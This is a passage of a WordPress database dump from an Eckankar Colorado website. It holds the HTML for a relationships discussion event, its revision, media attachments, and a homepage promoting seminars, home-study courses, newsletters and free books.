col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Happiness in Your Relationships','','publish','closed','closed','','lifes-purpose-562','','','2023-11-17 07:59:19','2023-11-17 14:59:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269392',0,'mec-events','',0),(269393,15,'2023-11-17 07:48:13','2023-11-17 14:48:13','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Key to Better Relationships<br>\n</span></strong></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to better relationships with everyone in your life.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“You are soul.&nbsp; </span><span style=\"font-size: 14pt;\">Learn your purpose in life, which is to become a vehicle for this divine love”</span><br>\n<span style=\"font-size: 14pt;\">— Sri Harold Klemp, \'<em>ECK Wisdom on Relationships</em>\' p. 27</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this lively discussion about the&nbsp;<em>Spiritual</em>&nbsp;side of&nbsp;<em>Relationships</em>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-----------------------------------------------------------------------------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\n<span style=\"font-size: 14pt;\">The \'<em>ECK Wisdom on Relationships</em>\' booklet is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span><br>\n<span style=\"font-size: 14pt;\">It is described and available for purchase at the link below.&nbsp;</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Relationships-75-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Wisdom on Relationships</a></span><br>\n<span style=\"font-size: 14pt;\">(small booklet, 68 pages -&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir-Wsdm-Relationships_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Table of Contents</a>)</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\n<a href=\"https://www.youtube.com/watch?v=5eUV2iVYjn0\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14pt;\">Harold Klemp Shares Wisdom on Relationships:</span></a><br>\n<span style=\"font-size: 14pt;\">How to Become a Magnet for Love.</span><br>\n<span style=\"font-size: 14pt;\">05:18 - YouTube</span><br>\n<span style=\"font-size: 14pt;\">This clip is from Harold Klemp\'s 2010 talk</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Blog:</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://eckankarblog.org/category/relationships/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR BLOG - Relationships Category</a></span><br>\n<span style=\"font-size: 14pt;\">Articles to answer your spiritual questions and inspire you to lead the most fulfilling of lives.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, January 3rd at 7:00 p.m.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by </span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><a class=\"meetupreg\" style=\"background-color: #ffffff;\" href=\"https://www.meetup.com/segofaurora/events/296819662/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\n</div>\n</div>\n</div>\n</div>','Happiness in Your Relationships','','inherit','closed','closed','','269392-autosave-v1','','','2023-11-17 07:48:13','2023-11-17 14:48:13','',269392,'https://eckankar-colorado.org/?p=269393',0,'revision','',0),(269394,15,'2023-11-17 07:36:29','2023-11-17 14:36:29','','Relationships2','','inherit','closed','closed','','relationships2','','','2023-11-17 07:36:29','2023-11-17 14:36:29','',269392,'https://eckankar-colorado.org/wp-content/uploads/2023/11/Relationships2.webp',0,'attachment','image/webp',0),(269395,2,'2023-11-17 11:49:18','2023-11-17 18:49:18','','streaming-web-promo-1','','inherit','closed','closed','','streaming-web-promo-1','','','2023-11-17 11:49:18','2023-11-17 18:49:18','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg',0,'attachment','image/jpeg',0),(269396,2,'2023-11-21 09:31:10','2023-11-21 16:31:10','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\n<p>&nbsp;</p>\n</div>\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\n</div>\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"temp-gridblock-wrapper\"></div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">[MEC id=\"268667\"]</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\n<div class=\"container\">\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\n</div>\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\n	<li>All main-stage talks and performances; and</li>\n	<li>The 2023 digital Spiritual Art Gallery.</li>\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\n</ul>\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\nYour life can truly be a Soul Adventure!</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\n</div>\n</div>\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\n<div class=\"container\">\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\n<br>\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\n<p>&nbsp;</p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\n</div>\n</div>\n</div>\n</div>\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\n</div>\n</div>\n</div>\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\n</div>\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\n</div>\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\n</div>\n</div>\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\n<p>&nbsp;</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\nSoul Travel help you find God</p>\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow 